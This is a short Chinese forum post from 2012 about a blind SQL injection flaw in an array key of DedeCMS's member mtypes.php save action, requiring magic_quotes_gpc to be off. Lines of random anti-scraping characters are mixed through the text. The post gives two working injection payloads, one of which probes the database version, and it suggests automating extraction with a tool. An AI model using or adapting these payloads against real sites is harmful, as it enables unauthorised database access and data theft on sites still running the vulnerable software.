需要magic_quotes_gpc = Off,所以说是鸡肋啊.3 P3 U7 Y5 a+ {! @# J
* H' n4 t) J! H- h( v+ A4 n
( [- o! [ ~1 ^9 F M发生在数组key里的注射漏洞,有点意思.
. W! H/ I' _7 f1 ?5 n X1 g " Y+ c7 {- V1 Y3 z' n
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下 n) V" m! r# x6 T, Y
' a9 v; u; e/ V, [( y
http://www.xxx.com /dede/member/mtypes.php?dopost=save
& p7 W3 T7 f' L$ a
0 A/ d2 D: M3 N, ^( f) w8 Kexploit:
~; r/ w& E/ p0 Y5 lmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
( C8 r* W# g( C$ Cmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r7 S2 ^! f9 Y+ U- c+ G# z( c& }$ i
|
发表于 2012-12-20 08:08:09
收藏
支持
反对